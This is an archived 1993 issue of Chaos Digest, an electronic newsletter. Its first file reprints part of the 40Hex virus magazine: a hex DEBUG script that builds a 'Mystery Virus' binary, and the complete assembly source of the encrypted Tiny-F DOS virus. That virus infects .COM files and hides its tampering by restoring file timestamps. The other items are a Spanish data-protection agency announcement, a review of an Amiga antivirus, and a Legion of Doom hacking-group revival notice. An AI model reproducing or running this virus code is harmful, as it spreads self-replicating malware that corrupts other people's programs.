home *** CD-ROM | disk | FTP | other *** search
- Chaos Digest Vendredi 28 Mai 1993 Volume 1 : Numero 40
- ISSN 1244-4901
-
- Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
- Archiviste: Yves-Marie Crabbe
- Co-Redacteurs: Arnaud Bigare, Stephane Briere
-
- TABLE DES MATIERES, #1.40 (28 Mai 1993)
- File 1--40H VMag Issue 1 Volume 3 #008(2)-010 (reprint)
- File 2--Agence de Protection des Donnees Espagnoles (creation)
- File 3--"BootX" pour Amiga (critique)
- File 4--Nouveau rebondissement de _The Legion of Doom_ (news)
-
- Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
- available at no cost by sending a message to:
- linux-activists-request@niksula.hut.fi
- with a mail header or first line containing the following informations:
- X-Mn-Admin: join CHAOS_DIGEST
-
- The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
- or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
- 155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
- groups.
-
- Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
- 466893. Back issues of ChaosD can be found on the Internet as part of the
- Computer underground Digest archives. They're accessible using anonymous FTP:
-
- * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
- * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
- * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
- * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
- * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
- * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
- * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
-
- CHAOS DIGEST is an open forum dedicated to sharing French information among
- computerists and to the presentation and debate of diverse views. ChaosD
- material may be reprinted for non-profit as long as the source is cited.
- Some authors do copyright their material, and they should be contacted for
- reprint permission. Readers are encouraged to submit reasoned articles in
- French, English or German languages relating to computer culture and
- telecommunications. Articles are preferred to short responses. Please
- avoid quoting previous posts unless absolutely necessary.
-
- DISCLAIMER: The views represented herein do not necessarily represent
- the views of the moderators. Chaos Digest contributors
- assume all responsibility for ensuring that articles
- submitted do not violate copyright protections.
-
- ----------------------------------------------------------------------
-
- Date: Tue May 11 09:24:40 PDT 1993
- From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
- Subject: File 1--40H VMag Issue 1 Volume 3 #008(2)-010 (reprint)
-
- [suite du listing du "Mystery Virus":]
-
-
- e 0530 22 00 8A E0 E8 1D 00 3D 6F 63 74 0C 3D 78 65 75
- e 0540 10 E8 10 00 3C 65 EB 09 E8 09 00 3C 6D EB 02 FE
- e 0550 C0 5E 58 C3 AC 3C 43 72 06 3C 59 73 02 04 20 C3
- e 0560 9C 80 FC 68 2E FF 1E 91 07 C3 1E 06 56 57 50 53
- e 0570 51 52 8C DE 33 C0 8E D8 C4 06 90 00 06 50 C7 06
- e 0580 90 00 26 03 8C 0E 92 00 8E DE 33 C9 B8 00 43 E8
- e 0590 CE FF 8B D9 80 E1 FE 3A CB 74 07 B8 01 43 E8 BF
- e 05A0 FF F9 9C 1E 52 53 B8 02 3D E8 B4 FF 72 0A 8B D8
- e 05B0 E8 26 00 B4 3E E8 A8 FF 59 5A 1F 9D 73 06 B8 01
- e 05C0 43 E8 9C FF 33 C0 8E D8 8F 06 90 00 8F 06 92 00
- e 05D0 5A 59 5B 58 5F 5E 07 1F C3 0E 1F 0E 07 BA 95 07
- e 05E0 B9 18 00 B4 3F E8 78 FF 33 C9 33 D2 B8 02 42 E8
- e 05F0 6E FF 89 16 AF 07 3D 00 0B 83 DA 00 72 6C A3 AD
- e 0600 07 81 3E 95 07 4D 5A 75 17 A1 9D 07 03 06 AB 07
- e 0610 E8 91 01 03 06 A9 07 83 D2 00 8B CA 8B D0 EB 15
- e 0620 80 3E 95 07 E9 75 44 8B 16 96 07 81 C2 03 01 72
- e 0630 3A FE CE 33 C9 B8 00 42 E8 25 FF 05 00 07 90 83
- e 0640 D2 00 3B 06 AD 07 75 23 3B 16 AF 07 75 1D BA B1
- e 0650 07 8B F2 B9 EF 02 B4 3F E8 05 FF 72 0E 3B C8 75
- e 0660 0A BF 49 00 AC AE 75 03 E2 FA C3 33 C9 33 D2 B8
- e 0670 02 42 E8 EB FE A3 45 07 89 16 47 07 81 3E 95 07
- e 0680 4D 5A 74 0A 05 95 09 90 83 D2 00 74 19 C3 8B 16
- e 0690 AD 07 F6 DA 83 E2 0F 33 C9 B8 01 42 E8 C1 FE A3
- e 06A0 AD 07 89 16 AF 07 B8 00 57 E8 B4 FE 9C 51 52 81
- e 06B0 3E 95 07 4D 5A 74 05 B8 00 01 EB 07 A1 A9 07 8B
- e 06C0 16 AB 07 2E C7 06 47 00 00 07 BF 3A 07 AB 8B C2
- e 06D0 AB A1 A5 07 AB A1 A3 07 AB BE 95 07 A4 A5 33 D2
- e 06E0 B9 49 07 90 B4 40 E8 77 FE 72 27 33 C8 75 23 8B
- e 06F0 D1 B8 00 42 E8 69 FE 81 3E 95 07 4D 5A 74 15 C6
- e 0700 06 95 07 E9 A1 AD 07 05 46 00 A3 96 07 B9 03 00
- e 0710 EB 57 EB 5D E8 8A 00 F7 D0 F7 D2 40 75 01 42 03
- e 0720 06 AD 07 13 16 AF 07 B9 10 00 F7 F1 C7 06 A9 07
- e 0730 49 00 A3 AB 07 05 72 00 A3 A3 07 C7 06 A5 07 00
- e 0740 01 81 06 AD 07 49 07 83 16 AF 07 00 A1 AD 07 25
- e 0750 FF 01 A3 97 07 9C A1 AE 07 D0 2E B0 07 D1 D8 9D
- e 0760 74 01 40 A3 99 07 B9 18 00 BA 95 07 B4 40 E8 EF
- e 0770 FD 5A 59 9D 72 06 B8 01 57 E8 E4 FD C3 1E E8 07
- e 0780 00 C6 06 00 00 4D 1F C3 50 53 B4 62 E8 D1 FD 8C
- e 0790 C8 48 4B 8E DB F9 13 1E 03 00 3B D8 72 F5 5B 58
- e 07A0 C3 A1 9D 07 BA 10 00 F7 E2 C3 FE FF FD 00 FE 40
- e 07B0 75 73 73 72 40 40 40 40 40 76 89 92 95 73 8F 86
- e 07C0 94 40 40 48 83 49 40 40 96 51 4E 40 51 59 59 50
- e 07D0 40 FD 00 FE FC FD 00 4A 01 03 01 B8 01 0B 01 4A
- e 07E0 01 06 01 72 01 01 02 9F 01 09 01 15 01 02 02 15
- e 07F0 01 03 02 72 01 08 01 4A 01 05 02 26 01 01 01 4A
- e 0800 01 08 02 15 01 03 02 15 01 03 03 26 01 08 02 26
- e 0810 01 05 01 4A 01 01 02 72 01 08 01 72 01 04 01 72
- e 0820 01 04 00 72 01 08 02 9F 01 06 02 B8 01 01 02 EE
- e 0830 01 0F FF FF FF 00 00 00 01 00 00 00 00 00 00 00
- e 0840 01 3A 16 D8 8E C3 8E B8 00 4C 05 00 00 00 1A 1A
-
- rcx
- 74e
- w
- q
-
- +++++
-
- 40Hex Issue 3 0009
-
- The Tiny-F Virus
-
- In our first issue we gave you the source for the Tiny-B virus.
- Well some people don't quit.
-
- After months of struggling Psyco-genius decided to give
- his attempts to make this a good virus over to someone who
- knows what he's doning.
-
- So Dark (mastered assembler in one week) Angel did some mods
- and here we have it.
-
- -------------------------------------------------------------------------
- tinyv SEGMENT BYTE PUBLIC 'code'
- ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
-
- ORG 100h
-
- DOS EQU 21h
-
- start: JMP pgstart
- exlbl: db 0CDh, 20h, 7, 8, 9
- pgstart:CALL tinyvir
- tinyvir:
- POP SI ; get SI for storage
- SUB SI,offset tinyvir ; reset SI to virus start
- MOV BP,[SI+blnkdat] ; store SI in BP for return
- ADD BP, OFFSET exlbl
- CALL endecrpt
- JMP SHORT realprog
-
- ;------------------------------------------------------------------------
- ;nonencrypted subroutines start here
- ;------------------------------------------------------------------------
-
- ;PCM's encryption was stupid, mine is better - Dark Angel
- endecrpt:
- ;Only need to save necessary registers - Dark Angel
- PUSH AX ; store registers
- PUSH BX
- PUSH CX
- PUSH SI
- ;New, better, more compact encryption engine
- MOV BX, [SI+EN_VAL]
- ADD SI, offset realprog
- MOV CX, endenc - realprog
- SHR CX, 1
- JNC start_encryption
- DEC SI
- start_encryption:
- MOV DI, SI
- encloop:
- LODSW ;DS:[SI] -> AX
- XOR AX, BX
- STOSW
- LOOP encloop
-
- POP SI ;restore registers
- POP CX
- POP BX
- POP AX
- RET
- ;-----end of encryption routine
- nfect:
- CALL endecrpt
- MOV [SI+offset endprog+3],AX;point to data
- MOV AH,40H ;write instruction
- LEA DX,[SI+0105H] ;write buffer loc |
- MOV CX,offset endprog-105h ;(size of virus) --\|/--
- INT DOS ;do it!
- PUSHF
- CALL endecrpt
- POPF
- JC outa1 ;error, bug out
- RET
- outa1:
- JMP exit
-
-
- ;------------------------------------------------------------------------
- ; Unencrypted routines end here
- ;------------------------------------------------------------------------
- realprog:
- CLD ;forward direction for string ops
- ;Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
- ;Instead, set DTA to SI+ENDPROG+131h
- MOV AH, 1Ah ;Set DTA
- LEA DX, [SI+ENDPROG+131h] ; to DS:DX
- INT 21h
-
- LEA DX,[SI+fspec] ;get filespec (*.COM)
- XOR CX, CX ; || (clear regs)
- MOV AH,4EH ; || (find files)
- mainloop: ; \||/
- INT DOS ; ----\/----
- JC hiccup ;no more files found, terminate virus
- ;Next part had to be changed to account for new DTA address - Dark Angel
- LEA DX, [SI+ENDPROG+131h+30];set file name pointer
- ;(offset 30 is DTA filename start)
- MOV AX,3D02H ;open file
- INT DOS ;do it!
- MOV BX,AX ;move file handle to BX
- MOV AH,3FH ;read file
- LEA DX,[SI+endprog] ;load end of program (as buffer pntr)
- MOV DI,DX ;set Dest Index to area for buffer
- MOV CX,0003H ;read 3 bytes
- INT DOS ;do it!
- CMP BYTE PTR [DI],0E9H ;check for JMP at start
- JE infect ;If begins w/JMP, Infect
- nextfile:
- MOV AH,4FH ;set int 21 to find next file
- JMP mainloop ;next file, do it!
- hiccup: JMP exit
- infect:
- MOV AX,5700h ;get date function
- INT DOS ;do it!
- PUSH DX ;store date + time
- PUSH CX
- MOV DX,[DI+01H] ;set # of bytes to move
- MOV [SI+blnkdat],DX ; " " " " " "
- ;Tighter Code here - Dark Angel
- XOR CX,CX ; " " " " " " (0 here)
- MOV AX,4200H ;move file
- INT DOS ;do it!
- MOV DX,DI ;set dest index to area for buffer
- MOV CX,0002H ;two bytes
- MOV AH,3FH ;read file
- INT DOS ;do it!
- CMP WORD PTR [DI],0807H ;check for infection
- JE nextfile ;next file if infected
- getaval: ;encryption routine starts here
- ;My modifications here - Dark Angel
- MOV AH, 2Ch ;DOS get TIME function
- INT DOS ;do it!
- OR DX, DX ;Is it 0?
- JE getaval ;yeah, try again
- MOV word ptr [si+offset en_va], DX ; Store it
- ;Tighter code here - Dark Angel
- XOR DX,DX ;clear regs
- XOR CX,CX ; " "
- MOV AX,4202H ;move file pointer
- INT DOS ;do it!
- OR DX,DX ;new pointer location 0?
- JNE nextfile ;if no then next file
- CMP AH,0FEH ;new pointer loc too high?
- JNC nextfile ;yes, try again
- CALL nfect
- MOV AX,4200H ;move pointer
- XOR CX, CX ;clear reg
- MOV DX,OFFSET 00001 ;where to set pointer
- INT DOS ;do it!
- MOV AH,40H ;write to file
- LEA DX,[SI+offset endprog+3];write data at SI+BUFFER
- MOV CX,0002H ;two bytes (the JMP)
- INT DOS ;do it!
- MOV AX,5701h ;store date
- POP CX ;restore time
- POP DX ;restore date
- INT DOS ;do it!
- exit:
- MOV AH,3EH ;close file
- INT DOS ;do it!
-
- ;Return DTA to old position - Dark Angel
-
- MOV AH, 1Ah ;Set DTA
- MOV DX, 80h ; to PSP DTA
- INT 21h
-
- JMP BP
-
- ;------------------------------------------------------------------------
- ;encrypted data goes here
- ;------------------------------------------------------------------------
-
- fspec LABEL WORD
- DB '*.COM',0
- nondata DB 'Tiny-F version 1.1' ;Program identification
- DB '%$!"&%',=)%&-!' ;author identification
- DB 'Released 10-19-91' ;release date
- endenc LABEL BYTE ;end of encryption zone
- ;------------------------------------------------------------------------
- ;nonencrypted data goes anywhere after here
- ;------------------------------------------------------------------------
-
- blnkdat LABEL WORD
- DW 0000H
-
- ;Only en_val is needed now because of new encryption mechanism
- en_val DW 0h
-
- endprog LABEL WORD
- tinyv ENDS
- END start
-
- +++++
-
- 40Hex Issue 3 0010
-
- In Closing
-
- Well that will do it for this issue. Sorry it took so damn long,
- but screw it.
-
- Next issue we will have more articals, more viruses, and all that.
-
- We were supposed to have an interview with an Amiga virus writer
- this issue but we just couldn't get it in time. Also we were
- planning an interview with John Mcafee, but the same story there.
-
- Also next issue, I hope to have the Bob Ross virus, from the
- twisted mind of Dark Angel. And If I can find it, the DIR-2 virus
- and The Teqeulla Virus, so I can't spell.
-
- See you then.
-
- ------------------------------
-
- Date: Sun, 16 May 93 21:01:10 -0100
- From: rfcalvo@guest2.atimdr.es (Rafael Fernandez Calvo )
- Subject: File 2--Agence de Protection des Donnees Espagnoles (creation)
-
-
- CCCCC LL II
- CC LL II
- CC LL II -- N E W S FROM S P A I N --- May 16, 1993
- CCCCC LLLLLL II
-
- COMMISSION for LIBERTIES
- and INFORMATICS (*)
-
-
- DATA PROTECTION AGENCY CREATED BY THE SPANISH COVERNMENT
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
- The Government of the Kingdom of Spain approved on May 4th, 1993 the
- Estatute of the Data Protection Agency (Agencia de Proteccion de Datos), the
- body that, according to the Law on Protection of Personal Data (whose acronym
- is LORTAD) approved by the Spanish Parliament in October 1992, will watch
- over proper observance of this law.
-
- According to its Estatute, the Agency is an independent body, headed
- by its Director, who will be nominated by the Government among the members
- of the Consultive Council. The Council will have nine members, elected for
- a period of four years by the Congress, the Senate, the Ministry of Justice,
- the Regional Governments, the Federation of Provinces and Cities, the Royal
- Academy of History, the Council of Universities, the Council of Consumers and
- Users, and the Council of Chambers of Commerce, respectively. Trade Unions
- and DP Professionals will not be represented in spite of the proposals of
- CLI, that also submitted one of having the Director nominated by the Council
- itself instead of by the Government in order to insure the independence of
- the Agency
-
- Among the powers of the Agency are those of dictating fines of up to
- 1 Million US $ and sealing personal data files of companies and entities that
- infringe the law. The Agency will the body representing Spain in the European
- Community, the Council of Europe and the Schengen Agreement on free
- circulation of people within the EC borders for all the matters regarding
- personal data protection.
-
- The Data Protection Agency will have to be created in the middle of a
- sharp campaign for Congress and Parliament in elections that will be held on
- June 6, whose outcome, according to the polls, will be very tight between the
- ruling Socialist Party and the center-right People's Party, with a well
- placed third party: United Left (a communist-led coalition). These two
- parties gave strong support to the position of CLI with regard to the LORTAD
- during its discussion in Congress and Senate.
-
- CLI achieved in February its goal of seeing the appeal against the
- Personal Data Law put before the Constitutional Court of Spain by the
- Ombudsman, the Peoples' Party and the Regional Parliament of Catalonia. The
- appeals address basically the concerns of CLI that the law establishes a lot
- of unjustified exceptions in favour of Government with regard to the rights
- that citizens have about their personal data. Even though the appeals don't
- interrupt the application of the law since Jan. 31, they leave the door open
- to its modification in the sense promoted by CLI.
-
- Let's recall that Spain is one of the very few countries whose Carta
- Magna foresees the dangers that can stem from misuse of Information
- Technology. In fact, its Constitution establishes that a "law will limit the
- use of Information Technologies in order to protect citizens' honour and
- their personal and family privacy as well as the unrestricted exercise of
- their rights" (article 18.4).
-
- The position of CLI about the LORTAD can be summarized as follows:
-
- - The law does not fulfill the expectations arisen, although it is a step
- forward in comparison with the current situation of "allegality" that has
- been a constant source of severe abuse against privacy;
-
- - The good side of the law is the regulation of personal data files
- in the hands of companies and private entities. Citizens will have
- wide rights to access, modification and cancellation of this kind of
- records.
-
- - The bad side stems from the following facts:
-
- a) The bill gives excessive and uncontrolled power to Policy Forces
- over collection and computerization of highly sensitive data: ideology,
- religion, beliefs, racial origin, health and sexual orientation.
-
- b) Computerized personal data records in the hands of all branches
- of Public Administrations will be in many cases excluded from the rights
- (access, modification, cancellation) given to citizens with regard to
- the same kind of data in the hands of private companies.
-
- c) The Data Protection Agency that will watch over proper observance of
- the law will have scarce autonomy from the Government, that will
- nominate and dismiss its Director.
-
-
- * SOME WORDS ABOUT CLI
-
- The --Commission for Liberties and Informatics, CLI-- is an independent
- and pluralistic organization that was officially constituted in April '91.
-
- Its mission is to "promote the development and protection of citizens'
- rights, specially privacy, against misuse of Information Technologies".
-
- As of May '93, CLI is composed by nine organizations, with a joint
- membership of about 3,000,000 people. They cover a very wide spectrum of
- social interest groups: associations of computer professionals, judges, civil
- rights leagues, trade unions, consumers groups, direct marketing industry,
- etc.
-
- CLI is confederated with similar bodies created in some other Spanish
- Regions such as Valencia, Basque Country and Catalonia, and has fluid
- working relationships with many public and private Data Protection bodies
- and entities all over the world, including CNIL, CPSR and Privacy
- International.
-
- CLI has its headquarters in:
-
- Padilla 66, 3 dcha.
- E-28006 Madrid, Spain
-
- Phone: (34-1) 402 9391
- Fax: (34-1) 309 3685
- E-mail: rfcalvo@guest2.atimdr.es
-
- ------------------------------
-
- Date: Sun May 23 00:06:00 -0600 1993
- From: roberts@decus.arc.ab.ca ("Rob Slade, DECrypt Editor, VARUG NLC rep )
- Subject: File 3--"BootX" pour Amiga (critique)
- Copyright: Robert M. Slade, 1993
-
-
- Comparison Review
-
- Company and product:
-
- Peter Stuer
- Kauwlei 21
- B-2550 Kontich
- Belgium
- Peter.Stuer@p7.f603.n292.z2.FidoNet.Org
- BootX 5.23
-
- Summary: Scanner and disinfector with some operation restriction
-
- Cost: unknown
-
- Rating (1-4, 1 = poor, 4 = very good)
- "Friendliness"
- Installation
- Ease of use
- Help systems
- Compatibility
- Company
- Stability
- Support
- Documentation
- Hardware required
- Performance
- Availability
- Local Support
-
- General Description:
-
- Comparison of features and specifications
-
- User Friendliness
-
- Installation
-
- Both automated and manual installation is provided.
-
- Ease of use
-
- BootX can be run from either the CLI or the Workbench. Once invoked it can
- be made the "foreground task" by a "hot key" call. The program is menu
- driven, with a comprehensive range of actions.
-
- Help systems
-
- Can use the AmigaGuide.library function if available.
-
- Compatibility
-
- Unknown but unlikely to cause problems. Some problems are noted with
- Enforcer. Will work with certain compression programs to check compressed
- executables.
-
- Company Stability
-
- Unknown, but this is currently one of the major recommended Amiga antivirals.
- The program is distributed as freeware.
-
- Company Support
-
- The author's mail and email addresses are given, as well as contact info for
- "Safe Hex International".
-
- Documentation
-
- Simple but straightforward directions on the installation and running of the
- program. There is little general discussion of viral programs and operation,
- but some is mentioned in conjunction with certain features of the program.
- Unusually for a shareware/freeware package there is an extensive glossary
- which may provide some background. (I learned, for instance, that a
- "linkvirus" is the term for what is more generally known as a program or file
- infecting virus).
-
- System Requirements
-
- 512K RAM or higher and at least one disk drive. KickStart v2.04 and
- ReqTools.library v38 or higher. Workbench v2.1 or higher to use the language
- independence utility and v3.0 or higher to use the AmigaGuide.library help
- feature. Various decompression programs may be needed to check compressed
- executables.
-
- Performance
-
- Unknown at this time due to lack of a test suite. Currently one of the most
- highly recommended Amiga antivirals.
-
- Local Support
-
- The author is reachable via Fidonet and Internet mail.
-
- Support Requirements
-
- Users experienced with using shareware should have no problems.
-
- ==============
- Vancouver ROBERTS@decus.ca | Slade's Law of Computer
- Institute for Robert_Slade@sfu.ca | Literacy:
- Research into rslade@cue.bc.ca | - There is no such thing
- User p1@CyberStore.ca | as "computer illiteracy";
- Security Canada V7K 2G6 | only illiteracy itself.
-
-
- [ChaosD: Voici les commentaires de l'auteur de ce programme sur ce papier:]
-
- Date: Wed May 26 17:58:49 PDT 1993
- From: Peter.Stuer@p7.f603.n292.z2.fidonet.org (Peter Stuer )
-
- Hum...seems you're a bit behind on the news. I stopped developing BootX last
- March because of lack of time.
-
- /~\
- C oo
- _( ^)
- / ~\ Peter Stuer.
-
- --
- uucp: uunet!m2xenix!puddle!2!292!603.7!Peter.Stuer
- Internet: Peter.Stuer@p7.f603.n292.z2.fidonet.org
-
- ------------------------------
-
- Date: Tue, 25 May 1993 10:32:28 -0400
- From: tdc@zooid.guild.org (TDC )
- Subject: File 4--Nouveau rebondissement de _The Legion of Doom_ (news)
-
-
- Final Anouncement
-
- The
- LOD
- Legion of Doom
- Is Back!
-
- No that has not been a mis-print... the LOD has returned! The world's
- greatest hacking group has formally been reinstated to bring back dignity
- and respect to a scene that has rapidly deteriorated since its departure.
-
- The LOD is not just another "Group" that goes around with upper/lower case
- names, trading in PBX's and VMB's and wouldn't know COSMOS if it hit them
- over the head. It's a sad day indeed when the term hacker is used to refer
- to every code and credit card abusing rodent in the nation. We intend
- through our presence and many innovative projects, not to mention the
- technical journal to restore the original values of technical exploration
- and knowledge that the term hacker was founded on.
-
- The LOD imbodies the pinnacle of understanding that comes from relentless
- exploration of the "system" backwards and forwards. It is an organization
- dedicated to understanding the world's computer and telephone networks.
- Enabling everyone to progress forward in technology. The accumulated product
- of this--the Technical Journals, full of information unavailible anywhere
- except from telco manuals represents something to valuable to lose.
-
- [...] This will be the primary of purpose the new, revived LOD - the assembly
- and release of a Technical Journal. The previous four issues, now several
- years old BADLY need updating.
-
- The Journal will rely heavily on reader submitted articles and information,
- so anything you wish to contribute would be GREATLY appreciated. Acceptable
- submitions would include ORIGINAL "how-to- guides" on various systems,
- security discussions, technical specifications and doccumentation. Computer
- and telephone related subjects are not the only ones acceptable. If you
- remember the former journals had articles concerning interrogation, physical
- security among others.
-
- The next LOD Technical Journal will comprise almost entirely of freelance or
- reader submitted articles. So without YOUR contributions it can not proceed!
- Solid progress is being made in the next Technical Journal by both free-
- lancers and group members. But bigger is better, as you can never have too
- much information or instruction.
-
- SEND UP ALL ORIGINAL ARTICLES FOR PUBLICATION!!!
-
- If you wish to hold the wonderful honour of being an LOD Member (Won't
- this look good on the resume), you may apply by contacting us. The
- qualifications should need no elaboration.
-
- Regardless of the unbased claims made by others, the LOD is as strong and
- capable as it ever was. Legendary groups like the LOD are not born this way.
- They take time to form, and restarting almost from scratch almost three years
- later, time is obviously needed. We say to all the skeptics, hang on to your
- premature judgements until we're on our feet and judge by actions not
- opinions.
-
- To set the record straight once and for all, and to convince the skeptics
- that doubt the validity of all this, the Legion of Doom >IS< BACK. Next
- month, a full-fledged Technical Journal will be widely released, and you're
- doubts and questions will be once and for all answered with uncontestable
- fact.
-
- In addition to needing articles for the upcoming Journals, some sites on the
- net to aid in distribution would also be welcomed. Someone willing to donate
- the resources necessary to operate a subscription type mailing list service
- is also needed. Send all offers and articles to our email account or PO Box.
-
- Reach us at: tdc@zooid.guild.org
-
- Or by blindingly quick, faster than light mail at:
-
- LOD
- P.O. Box 104
- 4700 Keele Street
- North York, ON M3J-1P3
-
- Closing date for article submittions to the LOD Technical Journal
- Number 5 is: Monday 14 June, 1993.
-
- Release date: Friday 18 June, 1993.
-
- Since we have no monetary or contractual obligation to anyone, these dates
- are of course tentative. But since or at least initially we will rely almost
- entirely on reader submitions a date is needed to get potential writers into
- gear.
-
- Note that the LOD does not engage or condone illegal or criminal activities.
- This would cover, but is not limited to, theft of long distance services,
- credit fraud or data destruction/alteration.
-
- Lord Havoc
-
- ------------------------------
-
- End of Chaos Digest #1.40
- ************************************
-